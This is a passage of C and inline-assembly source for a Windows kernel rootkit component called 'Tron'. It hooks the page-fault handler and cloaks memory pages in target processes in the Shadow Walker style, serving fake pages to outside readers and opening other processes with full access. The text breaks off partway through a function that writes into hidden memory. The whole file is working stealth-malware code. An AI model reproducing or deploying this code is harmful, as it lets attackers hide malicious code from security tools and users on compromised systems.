#include <ntddk.h>
#include <WinDef.h>
#include <ntstrsafe.h>
#include "sysdefs.h"
#include "librootkit.h"
#include "tron_kernel.h"
#include "tron_user.h"


// FIXME: Need spinlocks on these data structures KeInitializeSpinLock
//        Also spinlocks for peb borrowing

// FIXME: This is bullshit.. use SLISTS with SpinLocks
DWORD pids[MAX_PIDS];
int num_pids;
FakeAlloc fakes[MAX_FAKES];  // Need not be VirtualLocked
int num_fakes; 

// Freaking pragma doesn't fucking work.. Marks it readonly somehow..
//#pragma section(".infodisc", read,write,execute,nopage)
/*__declspec(allocate(".infodisc"))*/ 

HookedPage hooks[MAX_HOOKS]; 
int num_hooks; 

PermsEntry perms[MAX_PERMS]; 
int num_perms; 


IDT idt;
INT_VECTOR pfault_handler;
DWORD oldHandler;

#define MAX(a,b) ((a) > (b) ? (a) : (b))
#define MIN(a,b) ((a) < (b) ? (a) : (b))


// This function can bang on all the kernel memory we want, because 
// kernel addresses are passed through our fault handler. We actually
// have it easier than shadow walker.
HookedPage * NTAPI FindPageInHookedList(DWORD cr3, DWORD addr, DWORD eip)
{
    int i;
#ifdef _IRQL_DEBUG_
    KIRQL irql = KeGetCurrentIrql();
#endif

    // Let fault be serviced.. We can't seem to make the god damn pragma work..
    if((ULONG)&hooks[0] <= addr && addr <= ((ULONG)&hooks[0]) + sizeof(hooks)) {
        return 0; 
    }

    if((ULONG)&perms[0] <= addr && addr <= ((ULONG)&perms[0]) + sizeof(perms)) {
        return 0; 
    }

    // FIXME: Hash Table of SLISTs. Can be verified by O(N) search.. But need
    // to kill teh memmoves though

    // Check for allowed code first.. Allowed code does not need the 
    // hooked descriptor because no spoof should happen unless it is execing
    if(eip != addr) {
        for(i = 0; perms[i].cr3; i++) {
            if(perms[i].cr3  == (cr3 & 0xFFFFF000)
                && perms[i].AllowedCodeStart <= eip 
                                             && eip <= perms[i].AllowedCodeEnd
                    && perms[i].VirtStart <= addr 
                                          && addr < perms[i].VirtEnd) {
#ifdef _PERF_DEBUG_
                perms[i].hits++;
#endif
                return (HookedPage *)-1;
            }    
        }
    }

    for(i = 0; hooks[i].CloakedVirtualAddress; i++) {
        if(hooks[i].CloakedVirtualAddress == (addr & 0xFFFFF000)) {
            if(hooks[i].cr3  == (cr3 & 0xFFFFF000)) {
#ifdef _PERF_DEBUG_
                hooks[i].hits++;
#endif
#ifdef _IRQ_DEBUG_
                hooks[i].maxIrql = MAX(hooks[i].maxIrql, irql);
                hooks[i].minIrql = MIN(hooks[i].minIrql, irql);
#endif
                return &hooks[i];
            }
        }
    }

    return NULL;
}

DWORD MyIsAddressPresent(DWORD addr)
{
    DWORD pres;
    __asm {
        mov eax, addr
        mov esi, PROCESS_PAGE_DIR_BASE
        mov ebx, eax
        shr ebx, 22
        lea ebx, [esi+ebx*4]
        test [ebx], 0x80
        jnz IsLargePage

        mov esi, PROCESS_PAGE_TABLE_BASE
        mov ebx, eax
        shr ebx, 12
        lea ebx, [esi+ebx*4]

    IsLargePage:
        mov eax, dword ptr [ebx]
        and eax, 0x1
        mov pres, eax
    }

    if(!pres)
        DbgPrint("Yo! Addr %x not present\n", addr);
        
    return pres;
}

void BadCoded() // Placeholder to save user from own stupidity
{
    __asm {
        sti
    }
    LR_NOTE(("NOT: Call insn not found!"));
    __asm {
        cli
    }
}

//extern int __stdcall Kei386EoiHelper(void);
DWORD Kei386EoiHelper = 0x804df05c; // Unused.. for reference only
void __declspec(naked) SetupEoiHelperStack()
{
    // Stack setup is below +
    // ebp
    // esi
    // edi
    // fs
    // [30:0]
    // space
    // eax
    // ecx
    // edx
    // ds
    // es
    // gs
    // .. 0x30 space..
    __asm {
        push ebp
        push esi
        push edi
        push fs
        mov ebx, 0x30
        mov fs, bx
        mov ebx, fs:0
        push ebx
        sub esp, 4
        push eax
        push ecx
        push edx
        push ds
        push es
        push gs
        mov ax, 0x23
        sub esp, 0x30
        mov ds, ax
        mov es, ax
        mov ebp, esp
    }
}

// Massive credits to Sparks & Butler
void __declspec( naked ) NewInt0EHandler(void)                  
{
    // Stack arguments:
    // 5. SS
    // 4. ESP
    // 3. EFLAGS
    // 2. CS
    // 1. EIP
    // 0. Error Code

    // Test perms
    __asm
    {
        pushad /* Adds 0x20 of registers to stack */
        mov eax, cr2
        push eax
        mov edx, dword ptr [esp+0x24] // error code
        
        // Read/WriteProcessMemory and friends are kernel based..
        // so we want kernel faults too.
        // test edx 0x4 // Kernel
        // jz Passdown
        test edx, 1 
        jnz PassDown

        cmp eax, MmHighestUserAddress // only user addrs 
        ja PassDown

        // TODO: Borrow either the "reserved" PTE bit or the proto
        // pte bit to mark pages as hooked to avoid checking on 
        // EVERY fault.. But this is hard because then we have to
        // deal with faults in the page tables themselves...
        push [esp+0x28] // eip
        mov eax, cr2
        push eax
        mov eax, cr3
        push eax
        call FindPageInHookedList // stdcall
        
        mov ebp, eax // HookedRegion structure
        cmp ebp, 0
        jz PassDown
        
        // Ok, hooked page. Assume locked with VirtualLock..
        mov eax, cr2
        mov esi, PROCESS_PAGE_DIR_BASE
        mov ebx, eax
        shr ebx, 22
        lea ebx, [esi+ebx*4]
        test [ebx], 0x80
        jnz IsLargePage

        mov esi, PROCESS_PAGE_TABLE_BASE
        mov ebx, eax
        shr ebx, 12
        lea ebx, [esi+ebx*4]

    IsLargePage:
        cmp [esp+0x28], eax // eip == faulting addr?
        jne LoadDTLB

    //LoadITLB:
        mov ecx, [ebp].HookedPageCallback
        cmp ecx, BadCoded
        je CallOk
        
        mov eax, ecx         // Unpack stack offset in teh case of C2 ret
        and eax, 0xFFFF0000
        and ecx, 0x0000FFFF
        shr eax, 16
        sub esp, eax         // Adjust stack
        add ecx, [ebp].CloakedVirtualAddress

    CallOK:
        // yes, load ITLB
        // The following should work just fine.. just like driving drunk
        // on the highway! ;) WHeeeeee!!11
        //cli 
        or dword ptr [ebx], 0x1 // present
        call ecx // prime ITLB
        and dword ptr [ebx], 0xFFFFFFFE
        //sti
        jmp ReturnWithoutPassdown

    LoadDTLB:
        mov edx, [esp+0x28] // eip

        // Handle write attempts to non-writable pages..
        // 1. Check Error code for write
        // 2. Check PTE for write
        mov edi, [ebx]  // EDI = *pFaultedPTE
        and edi, 2  // 2 is write bit
        test edi, edi
        jnz DataOK // Writes allowed
        mov eax, [esp+0x24] // error code
        and eax, 2
        test eax, eax // Due to write
        jnz PassDown // Generate fault

    DataOK:
        cmp ebp, 0xffffffff // -1 means "allowed" code
        jne LoadFakeFrame
        
        // Our code is using this page. Let it through.
        
        // Place the entry in the tlb, cache it, but mark it invalid 
        // for next access after ctx switch
        //cli
        or dword ptr [ebx], 0x01
        // XXX: Need write barrier... seems to be a race here..
        mov al, byte ptr [eax]
        and dword ptr [ebx], 0xFFFFFFFE
        //sti
        jmp ReturnWithoutPassDown
        

        // Our code is not using this page
    LoadFakeFrame:        
        mov ecx, [ebp].FakeAddr
        and ecx, 0xFFFFF000
        test ecx, ecx // Allow user to try to claim memory is not mapped
        jz MakeFault

        mov edi, [ebx]  // EDI = *pFaultedPTE
        and edi, 0x00000FFF // get status bits of attempted page's pte
        or ecx, edi

        mov edx, [ebx] // save old PTE
        //cli
        mov [ebx], ecx  // replace faulting page's phys addr w/ fake+status


        //load DTLB
        or dword ptr [ebx], 0x01 // mark present
        mov eax, cr2 
        mov al, byte ptr [eax] // access it via read
        and edx, 0xFFFFFFFE // mark not present for ctx switch
        mov [ebx], edx // restore original PTE for next time
        //sti

    ReturnWithoutPassDown:
        add esp, 4 // discard saved cr2
        popad
        add esp, 4 // Clear Error code from stack for iret
        iretd

    MakeFault:
        // Set the protection violation bit, then pass down.
        add esp, 4 
        xor eax, eax
        mov cr2, eax
        or [esp+0x24], 1   // => page protection violation
        popad
        jmp oldHandler 

    PassDown:
        pop eax // saved cr2
        mov cr2, eax
        popad
        jmp oldHandler
    }
}

// Preserves status bits
DWORD GetPhysicalAddress( DWORD VirtualAddress )
{
    DWORD phys;   
    __asm                                                              
    {                                                                  
            cli                     //disable interrupts               
            pushad                                                     
            mov esi, PROCESS_PAGE_DIR_BASE                             
            mov edx, VirtualAddress                                    
            mov eax, edx                                               
            shr eax, 22                                                
            lea eax, [esi + eax*4]  //pointer to page directory entry  
            test [eax], 0x80        //is it a large page?              
            jnz Is_Large_Page       //it's a large page                
            mov esi, PROCESS_PAGE_TABLE_BASE                           
            shr edx, 12                                                
            lea eax, [esi + edx*4]  //pointer to page table entry (PTE)
            mov eax, [eax]
            mov phys, eax                                              
            jmp Done                                                   

            //NOTE: There is not a page table for large pages because 
            //the phys frames are contained in the page directory.     
        Is_Large_Page:                                             
            mov eax, [eax]
            mov phys, eax

        Done:                                                      
            popad                                                      
            sti                    //reenable interrupts               
    }//end asm                                                         

    return phys;                                                       

}

void MarkPageInvalid(DWORD VirtualAddress)
{
    __asm {
        invlpg VirtualAddress 
        cli
        pushad                                                     
        mov esi, PROCESS_PAGE_DIR_BASE                             
        mov edx, VirtualAddress                                    
        mov eax, edx                                               
        shr eax, 22                                                
        lea eax, [esi + eax*4]  //pointer to page directory entry  
        test [eax], 0x80        //is it a large page?              
        jnz Is_Large_Page       //it's a large page                
        mov esi, PROCESS_PAGE_TABLE_BASE                           
        shr edx, 12                                                
        lea eax, [esi + edx*4]  //pointer to page table entry (PTE)
        and dword ptr [eax], 0xFFFFFFFE
        jmp Done                                                   

        //NOTE: There is not a page table for large pages because 
        //the phys frames are contained in the page directory.     
        Is_Large_Page:                                             
        and dword ptr [eax], 0xFFFFFFFE

        Done:
        popad
        sti
    }
}

void MarkPageValid(DWORD VirtualAddress)
{
    __asm {
        cli
        pushad                                                     
        mov esi, PROCESS_PAGE_DIR_BASE                             
        mov edx, VirtualAddress                                    
        mov eax, edx                                               
        shr eax, 22                                                
        lea eax, [esi + eax*4]  //pointer to page directory entry  
        test [eax], 0x80        //is it a large page?              
        jnz Is_Large_Page       //it's a large page                
        mov esi, PROCESS_PAGE_TABLE_BASE                           
        shr edx, 12                                                
        lea eax, [esi + edx*4]  //pointer to page table entry (PTE)
        or dword ptr [eax], 1
        jmp Done                                                   

        //NOTE: There is not a page table for large pages because 
        //the phys frames are contained in the page directory.     
        Is_Large_Page:                                             
        or dword ptr [eax], 1

        Done:
        popad
        sti
    }
}

// This hack is due to a problem where in (rare?) cases
// ZwFreeVirtualMemory calls MiSwapWslEntries which then happens to
// choose a cloaked page to swap, but then sees an inconsistency
// betwen non-present PTE but locked memory and BugCheck()s.
// The hack is to mark everything present right before all calls
// to VirtualFree..
//
// TODO: It may be possible to use the System/Owner PTE bit a-la Pax
// instead of the 'valid' bit. The owner bit may not be verified... 
// then again it may be. In any event this requires putting the fake 
// page in the PTE instead of the real one so kernel access would 
// still get fake data. This is less work unless other cases of valid 
// vs locked verification crop up.
NTSTATUS IntFreeVirtualMemory(DWORD pid, HANDLE ProcessHandle,
        PVOID *BaseAddress,PULONG FreeSize,ULONG FreeType)
{
    PEPROCESS peproc;
    KAPC_STATE savedAPC;
    NTSTATUS stat;
    int i;
    DWORD cur_cr3;
   
    stat = PsLookupProcessByProcessId(pid, &peproc);

    if(!NT_SUCCESS(stat)) {
        LR_NOTE(("NOT: Cannot find process %d for free\n", pid));
        return stat;
    }
 
    KeStackAttachProcess(peproc, &savedAPC);
    __asm {
        mov eax, cr3
        and eax, 0xFFFFF000
        mov cur_cr3, eax
    }

    for(i = 0; hooks[i].CloakedVirtualAddress; i++) {
        if(hooks[i].cr3 == cur_cr3) {
            LR_DEBUG(("DBG: Marking %x Valid for free\r\n", hooks[i].CloakedVirtualAddress));
            MarkPageValid(hooks[i].CloakedVirtualAddress);
        }
    }
    KeUnstackDetachProcess(&savedAPC);

    stat = sa.ZwFreeVirtualMemory(ProcessHandle, BaseAddress, FreeSize,
            FreeType);

    KeStackAttachProcess(peproc, &savedAPC);
    for(i = 0; hooks[i].CloakedVirtualAddress; i++) {
        if(hooks[i].cr3 == cur_cr3) {
            LR_DEBUG(("DBG: Marking %x Invalid after free\r\n", hooks[i].CloakedVirtualAddress));
            MarkPageInvalid(hooks[i].CloakedVirtualAddress);
        }
    }
    KeUnstackDetachProcess(&savedAPC);

    return stat;
}


// Does fake have to be locked also? Yes, yes it does.
// Caller must ensure that there is a near ret (0xC3) inside each page
NTSTATUS NTAPI DoAddCloak(DWORD pid, DWORD cloak_start, DWORD cloak_end, 
        DWORD fake)
{
    DWORD cur_page = cloak_start & 0xFFFFF000;
    ULONG cur_cr3;
    DWORD cur_phys;
    WORD stack_offset = 0xffff;
    int i;
    
    LR_DEBUG(("DBG: DoAddCloak(%d, %x, %x, %x)\n", pid, cloak_start, cloak_end, fake));
    
    __asm {
        mov eax, cr3
        and eax, 0xFFFFF000
        mov cur_cr3, eax
    }

    for(i = 0; i < MAX_HOOKS-1; i++) {
        if(!hooks[i].CloakedVirtualAddress) break;
    }    
    
    for(; cur_page < cloak_end; cur_page+=PAGE_SIZE) {
        DWORD Callback;
        DWORD BestCallback = 0;

        if(i==MAX_HOOKS-1) {
            LR_WARN(("WRN: Out of space in hooks array: %d\n", i));
            return STATUS_NO_MEMORY; 
        }

        cur_phys = GetPhysicalAddress(cur_page);
        if(cur_phys & (1<<7)) {
            LR_WARN(("WRN: Cannot support large page at cur address %x\n", 
                        cur_page));
            fake += PAGE_SIZE;
            continue;
        }

        if(cur_phys & (1<<10)) {
            LR_WARN(("WRN: Cannot support ProtoPTE at cur address %x\n", 
                        cur_page));
            fake += PAGE_SIZE;
            continue;
        }

        // TODO: Make this work with large pages
        // Ranges spanning multiple pages are out because of the callback.
        hooks[i].CloakedVirtualAddress = cur_page;
        hooks[i].cr3 = cur_cr3;

        for(Callback = hooks[i].CloakedVirtualAddress; 
                Callback < hooks[i].CloakedVirtualAddress+PAGE_SIZE; 
                Callback++) {
            
            // TODO: We could go really crazy and look for far rets also
            if (*((UCHAR *)Callback) == 0xC3) {
                stack_offset = 0;
                BestCallback = Callback;
                break;
            } else if (*((UCHAR *)Callback) == 0xC2) {
                if(stack_offset > *((WORD *)(Callback+1))) {
                    stack_offset = *((WORD *)(Callback+1));
                    BestCallback = Callback;
                }
            }
        }

        if(!BestCallback) {
            LR_NOTE(("WRN: Page %x has no return opcode. Marking data only..\n", 
                        Callback-PAGE_SIZE));
            hooks[i].HookedPageCallback = (DWORD)BadCoded;
        } else {
            LR_DEBUG(("DBG: Found stack ret %d at %x\n", stack_offset,
                        BestCallback));
            hooks[i].HookedPageCallback = BestCallback & 0x0FFF; // page offset
            hooks[i].HookedPageCallback |= (stack_offset << 16); 
        }

        MarkPageInvalid(hooks[i].CloakedVirtualAddress);
#ifdef _PERF_DEBUG_
        hooks[i].hits = 0;
#endif
        if (fake) {
            hooks[i].FakeAddr = GetPhysicalAddress(fake);
            fake += PAGE_SIZE;
            
            if(hooks[i].FakeAddr & (1<<7)) {
                LR_WARN(("WRN: Cannot support large page at fake address %x\n", 
                            cur_page));
                continue;
            }
            
            if(hooks[i].FakeAddr & (1<<10)) {
                LR_WARN(("WRN: Cannot support ProtoPTE at fake address %x\n", 
                            fake));
                continue;
            }

        } else {
            hooks[i].FakeAddr = 0; 
        }
        
        LR_DEBUG(("DBG: Added hook %x:%x(%x) for cr3: %x\n",
                    hooks[i].CloakedVirtualAddress, fake, hooks[i].FakeAddr,
                    cur_cr3));
        i++;
        num_hooks++;
    }

    return 0;
}

NTSTATUS NTAPI AddCloak(DWORD pid, DWORD cloak_start, DWORD cloak_end, 
        DWORD fake_start, DWORD fake_end)
{
    HANDLE proc = (HANDLE)NtCurrentProcess();
    NTSTATUS stat;
    DWORD size = 0;
    DWORD written = 0;
    KAPC_STATE savedAPC;
    DWORD *pebptr;
    DWORD tmp[2];
    PEPROCESS peproc;
    BOOL in_process = (pid == (DWORD)PsGetCurrentProcessId());

    // XXX: Shit.. What if this damn thing is already cloaked?
    // System hang..
    if (cloak_start >= cloak_end
            || fake_start > fake_end) {
        LR_NOTE(("NOT: Fucked up args: %x > %x, %x > %x\n",
                    cloak_start, cloak_end, fake_start, fake_end));
        return STATUS_INVALID_PARAMETER; 
    }

    if (cloak_end > (DWORD)MmHighestUserAddress) {
        // In reality it should be trivial to fix this, but until
        // x64+PatchGuard there is no reason for me to do so.
        LR_NOTE(("NOT: Tron does not cloak kernel memory.\n"));
        return STATUS_INVALID_ADDRESS;
    }

    if (num_fakes >= MAX_FAKES-1) {
        LR_NOTE(("NOT: No space left in fakes array (jackass didn't make it a list yet)"));
        return STATUS_NO_MEMORY;
    }

    cloak_start = cloak_start & 0xFFFFF000;
    cloak_end = ((cloak_end+4095)&0xFFFFF000);
    size = cloak_end - cloak_start;

    if (!in_process) {
        CLIENT_ID id;
        OBJECT_ATTRIBUTES attrib;
        
        id.UniqueProcess = (HANDLE)pid;
        id.UniqueThread = 0;

        InitializeObjectAttributes(&attrib, NULL, OBJ_INHERIT, NULL, 
                NULL);

        // Technically only need VM_OPERATION and VM_WRITE, but fuck it
        stat = ZwOpenProcess(&proc, PROCESS_ALL_ACCESS, &attrib, &id);

        if(!NT_SUCCESS(stat)) {
            LR_NOTE(("NOT: OpenProcess: %x\n", stat));
            return stat;
        }
    }

    if (fake_start && fake_end) {

        if (size > fake_end - fake_start) {
            LR_NOTE(("NOT: Page aligned sizes do not match: %x-%x > %x-%x\n",
                        cloak_end, cloak_start, fake_end, fake_start));
            return STATUS_INFO_LENGTH_MISMATCH;
        }

        pebptr = BorrowBytesFromTeb(tmp, sizeof(tmp)); // Need userland addr

        size = cloak_end - cloak_start;

        pebptr[0] = 0;
        pebptr[1] = size;

        stat = sa.ZwAllocateVirtualMemory(proc, (PVOID*)&pebptr[0], 0, 
                &pebptr[1], MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        if(!NT_SUCCESS(stat)) {
            LR_WARN(("WRN: AllocateVirtualMemory: %x %d\n", stat, size));
            fake_start = 0;
            goto err;
        }

        // Needed for deallocation
        fakes[num_fakes].pid = pid;
        fakes[num_fakes].CloakedVirtualAddr = cloak_start;
        fakes[num_fakes].FakeVirtualAddr = pebptr[0];
        fakes[num_fakes].FakeSize = size;
        num_fakes++;

        stat = sa.ZwWriteVirtualMemory(proc, (PVOID)pebptr[0], 
                (PVOID)fake_start, size, &pebptr[1]);

        if(!NT_SUCCESS(stat)) {
            LR_WARN(("WRN: WriteVirtualMemory: %x %d/%d\n", stat, pebptr[1], size));
            goto err;
        }
        fake_start = pebptr[0];

        stat = MyProbeAndLockPages(proc, fake_start, fake_start+size);

        if(!NT_SUCCESS(stat)) {
            LR_WARN(("WRN: ProbeAndLock: %x\n", stat));
            goto err;
        }

        ReturnBytesToTeb(pebptr, tmp, sizeof(tmp));
    } else {
        // Needed for QueryVirtualMemory lying
        fakes[num_fakes].pid = pid;
        fakes[num_fakes].CloakedVirtualAddr = cloak_start;
        fakes[num_fakes].FakeVirtualAddr = 0;
        fakes[num_fakes].FakeSize = cloak_end - cloak_start;
        num_fakes++;
    }

    stat = MyProbeAndLockPages(proc, cloak_start, cloak_end);

    if(!NT_SUCCESS(stat)) {
        LR_NOTE(("NOT: ProbeAndLock: %x\n", stat));
        goto err;
    }
        

    if(!in_process) {
        ZwClose(proc);
        
        stat = PsLookupProcessByProcessId(pid, &peproc);

        if(!NT_SUCCESS(stat) || !peproc) {
            LR_NOTE(("NOT: Failed to find pid %d: %x\n", pid, stat));
            goto err;
        }

        KeStackAttachProcess(peproc, &savedAPC);
        stat = DoAddCloak(pid, cloak_start, cloak_end, fake_start);
        KeUnstackDetachProcess(&savedAPC);
    } else {
        stat = DoAddCloak(pid, cloak_start, cloak_end, fake_start);
    }

    return stat;

err:
    if(fake_start) {
        pebptr[0] = fake_start;
        pebptr[1] = size;
        IntFreeVirtualMemory(pid, proc, (PVOID*)&pebptr[0], 
                &pebptr[1], MEM_RELEASE);
        ReturnBytesToTeb(pebptr, tmp, sizeof(tmp));
    }
    if(!in_process) ZwClose(proc);
    return stat;

}

NTSTATUS NTAPI DoAddCode(DWORD pid, DWORD code_start, DWORD code_end,
        DWORD cloak_start, DWORD cloak_end)
{
    DWORD cur_page = cloak_start & 0xFFFFF000;
    ULONG cur_cr3;
    int i;
    
    LR_DEBUG(("DBG: DoAddCode(%d, %x, %x, %x %x)\n", pid, 
                code_start, code_end, cloak_start, cloak_end));
    
    __asm {
        mov eax, cr3
        and eax, 0xFFFFF000
        mov cur_cr3, eax
    }

    for (i = 0; i < MAX_PERMS-1; i++) {
        if (!perms[i].cr3) break;
    } 

    if(i==MAX_PERMS-1) {
        LR_WARN(("WRN: Out of space in hooks array: %d\n", i));
        return STATUS_NO_MEMORY; 
    }

    if(i!=num_perms) {
        LR_WARN(("WRN: Fewl can't count: %d %d\n", i, num_perms));
    }

    perms[i].cr3 = cur_cr3;
    perms[i].AllowedCodeStart = code_start;
    perms[i].AllowedCodeEnd = code_end;
    perms[i].VirtStart = cloak_start;
    perms[i].VirtEnd = cloak_end;
    num_perms++;

    LR_DEBUG(("DBG: Will allow access of %x:%x by %x:%x for cr3: %x\n",
                perms[i].VirtStart, 
                perms[i].VirtEnd, 
                perms[i].AllowedCodeStart, 
                perms[i].AllowedCodeEnd, 
                cur_cr3));
    return 0;
}


NTSTATUS NTAPI AddCode(DWORD pid, DWORD ok_code_start, 
        DWORD ok_code_end, DWORD cloak_start, DWORD cloak_end)
{
    HANDLE proc = (HANDLE)NtCurrentProcess();
    NTSTATUS stat;
    DWORD size = 0;
    DWORD written = 0;
    KAPC_STATE savedAPC;
    DWORD *pebptr;
    DWORD tmp[2];

    if(ok_code_start > ok_code_end || cloak_start > cloak_end) {
        LR_NOTE(("NOT: Fucked up args: %x > %x, %x > %x\n", ok_code_start, 
                    ok_code_end, cloak_start, cloak_end));
        return STATUS_INVALID_PARAMETER; 
    }

    cloak_start = cloak_start & 0xFFFFF000;
    cloak_end = ((cloak_end+4095)&0xFFFFF000);
    size = cloak_end - cloak_start;

    if(pid != (DWORD)PsGetCurrentProcessId()) {
        PEPROCESS peproc;
        
        stat = PsLookupProcessByProcessId(pid, &peproc);
        
        if(!NT_SUCCESS(stat) || !peproc) {
            LR_NOTE(("NOT: Failed to find pid %d: %x\n", pid, stat));
            return stat;
        }

        KeStackAttachProcess(peproc, &savedAPC);

        stat = DoAddCode(pid, ok_code_start, ok_code_end, cloak_start, cloak_end);

        KeUnstackDetachProcess(&savedAPC);

    } else {
        stat = DoAddCode(pid, ok_code_start, ok_code_end, cloak_start, cloak_end);
    }

    return stat;
}

NTSTATUS DoRemoveCloak(DWORD pid, DWORD cloak_start, DWORD cloak_end)
{
    NTSTATUS stat = 0;
    int i;
    DWORD cur_cr3;
    DWORD size;

    __asm {
        mov eax, cr3
        and eax, 0xFFFFF000
        mov cur_cr3, eax
    }
    
    for(i = 0; i < MAX_HOOKS-1; i++) {
        if(hooks[i].cr3 == cur_cr3 && 
            cloak_start <= hooks[i].CloakedVirtualAddress
                        && hooks[i].CloakedVirtualAddress < cloak_end) {
            LR_DEBUG(("DBG: Removing Hook %x for cr3 %x at IRQL %d\n",
                        hooks[i].CloakedVirtualAddress, cur_cr3, 
                        KeGetCurrentIrql()));
            MarkPageValid(hooks[i].CloakedVirtualAddress);
            memmove(&hooks[i], &hooks[i+1], 
                    sizeof(hooks) - (i+1)*sizeof(hooks[0]));
            num_hooks--;
            i--;
        }
    }

    for(i = 0; i < MAX_PERMS-1; i++) {
        if(perms[i].cr3 == cur_cr3 && 
            cloak_start <= perms[i].VirtStart
                        && perms[i].VirtEnd <= cloak_end) {
            LR_DEBUG(("DBG: Removing permission %x for cr3: %x\n",
                        perms[i].VirtStart, cur_cr3));
            memmove(&perms[i], &perms[i+1], 
                    sizeof(perms) - (i+1)*sizeof(perms[0]));
            num_perms--;
            i--;
        }
    }

    // Fakes are handled in RemoveCloak
    return stat;
}

NTSTATUS NTAPI RemoveCloak(DWORD pid, DWORD cloak_start, DWORD cloak_end)
{
    HANDLE proc = (HANDLE)NtCurrentProcess();
    NTSTATUS stat = 0;
    DWORD size = 0;
    DWORD written = 0;
    KAPC_STATE savedAPC;
    PEPROCESS peproc;
    DWORD *pebptr;
    DWORD tmp[2];
    int i;

    if(cloak_start >= cloak_end) {
        LR_NOTE(("NOT: Fucked up args: %x >= %x\n",
                    cloak_start, cloak_end));
        return STATUS_INVALID_PARAMETER; 
    }

    cloak_start = cloak_start & 0xFFFFF000;
    // XXX: Handle 0xffffffff case here..
    cloak_end = ((cloak_end+4095)&0xFFFFF000);
    size = cloak_end - cloak_start;

    if (pid != (DWORD)PsGetCurrentProcessId()) {
        CLIENT_ID id;
        OBJECT_ATTRIBUTES attrib;

        id.UniqueProcess = (HANDLE)pid;
        id.UniqueThread = 0;

        InitializeObjectAttributes(&attrib, NULL, OBJ_INHERIT, NULL, NULL);

        // Technically only need VM_OPERATION and VM_WRITE, but fuck it
        stat = ZwOpenProcess(&proc, PROCESS_ALL_ACCESS, &attrib, &id);

        if(!NT_SUCCESS(stat)) {
            LR_NOTE(("NOT: OpenProcess: %x\n", stat));
            return stat;
        }

        stat = PsLookupProcessByProcessId(pid, &peproc);
        
        if(!NT_SUCCESS(stat) || !peproc) {
            LR_NOTE(("NOT: Failed to find pid %d: %x\n", pid, stat));
            return stat;
        }

        KeStackAttachProcess(peproc, &savedAPC);

        stat = DoRemoveCloak(pid, cloak_start, cloak_end);

        KeUnstackDetachProcess(&savedAPC);

    } else {
        stat = DoRemoveCloak(pid, cloak_start, cloak_end);
    }


    pebptr = BorrowBytesFromTeb(tmp, sizeof(tmp)); // Need userland addr

    size = cloak_end - cloak_start;
    stat = 0;
    
    for(i = 0; fakes[i].pid; i++) {
        if(fakes[i].pid == pid && fakes[i].FakeVirtualAddr &&
                cloak_start <= fakes[i].CloakedVirtualAddr  
                               && fakes[i].CloakedVirtualAddr < cloak_end) {
            pebptr[0] = fakes[i].FakeVirtualAddr;
            pebptr[1] = fakes[i].FakeSize;
            
            LR_DEBUG(("DBG: Removing %x+%d for %d at IRQL %d\n", pebptr[0],pebptr[1], pid,
                        KeGetCurrentIrql()));

            stat = IntFreeVirtualMemory(pid, proc, (PVOID*)&pebptr[0], 
                    &pebptr[1], MEM_RELEASE);
            if(!NT_SUCCESS(stat)) {
                LR_WARN(("WRN: Error freeing memory for pid: %d %x\n", pid, stat));
            }

            pebptr[0] = fakes[i].CloakedVirtualAddr;
            pebptr[1] = fakes[i].FakeSize;
            stat = sa.NtUnlockVirtualMemory(proc, (PVOID*)&pebptr[0], &pebptr[1], 1);

            if(!NT_SUCCESS(stat)) {
                LR_WARN(("WRN: Error unlocking memory %x+%x for pid: %d %x\n", pebptr[0],
                            pebptr[1], pid, stat));
            }

            memmove(&fakes[i], &fakes[i+1], 
                    sizeof(fakes) - (i+1)*sizeof(fakes[0]));
            num_fakes--;
            i--;
        }
    }
   
    ReturnBytesToTeb(pebptr, &tmp, sizeof(tmp));

    if (pid != (DWORD)PsGetCurrentProcessId()) {
        ZwClose(proc);
    }

    return stat;
}


NTSTATUS DoRemoveCode(DWORD pid, DWORD code_start, DWORD code_end)
{
    int i = 0;
    DWORD cur_cr3;

    __asm {
        mov eax, cr3
        and eax, 0xFFFFF000
        mov cur_cr3, eax
    }

    for(i = 0; i < MAX_PERMS-1; i++) {
        if(perms[i].cr3 == cur_cr3 && 
            code_start <= perms[i].AllowedCodeStart
                        && perms[i].AllowedCodeEnd <= code_end) {
            LR_DEBUG(("DBG: Removing permission %x for cr3: %x\n",
                        perms[i].VirtStart, cur_cr3));
            memmove(&perms[i], &perms[i+1], 
                    sizeof(perms) - (i+1)*sizeof(perms[0]));
            num_perms--;
            i--;
        }
    }

    return 0;
}

NTSTATUS RemoveCode(DWORD pid, DWORD code_start, DWORD code_end)
{
    HANDLE proc = (HANDLE)NtCurrentProcess();
    NTSTATUS stat = 0;
    DWORD size = 0;
    DWORD written = 0;
    KAPC_STATE savedAPC;
    DWORD *pebptr;
    DWORD tmp[2];

    if(code_start > code_end) {
        LR_NOTE(("NOT: Fucked up args: %x > %x\n", code_start, code_end));
        return STATUS_INVALID_PARAMETER; 
    }

    if(pid != (DWORD)PsGetCurrentProcessId()) {
        PEPROCESS peproc;

        stat = PsLookupProcessByProcessId(pid, &peproc);
        
        if(!NT_SUCCESS(stat) || !peproc) {
            LR_NOTE(("NOT: Failed to find pid %d: %x\n", pid, stat));
            return stat;
        }

        KeStackAttachProcess(peproc, &savedAPC);

        stat = DoRemoveCode(pid, code_start, code_end);

        KeUnstackDetachProcess(&savedAPC);

    } else {
        stat = DoRemoveCode(pid, code_start, code_end);
    }

    return stat;
}

NTSTATUS WriteHidden(DWORD pid, DWORD dest, DWORD src, DWORD len)
{
    DWORD cur_page;
    DWORD tmp;
    DWORD *pebptr;
    NTSTATUS stat = 0;
    int i;

    for(i = 0; i < num_hooks; i++) {
        // Meh, don't really need to check the whole range..
        if(hooks[i].CloakedVirtualAddress == (dest & 0xfffff000)) {
            break;
        }
    }
    if(i == num_hooks) {
        LR_NOTE(("NOT: Write address %x is not hidden\n", dest));
        return STATUS_ADDRESS_NOT_ASSOCIATED;
    }

    if(pid != (DWORD)PsGetCurrentProcessId()) {
        DWORD written;
        HANDLE proc;
        PEPROCESS peproc;
        KAPC_STATE savedAPC;
        CLIENT_ID id;
        OBJECT_ATTRIBUTES attrib;

        stat = PsLookupProcessByProcessId(pid, &peproc);
        if(!NT_SUCCESS(stat) || !peproc) {
            LR_NOTE(("NOT: Failed to find pid %d: %x\n", pid, stat));
            return stat;
        }

        KeStackAttachProcess(peproc, &savedAPC);
        __asm {
            cli
            mov eax, cr3
            mov cr3, eax
            sti
        }

        // Loop:
        //   1. Mark all pages valid

        for(cur_page = dest; cur_page < (dest+len); cur_page += PAGE_SIZE) {
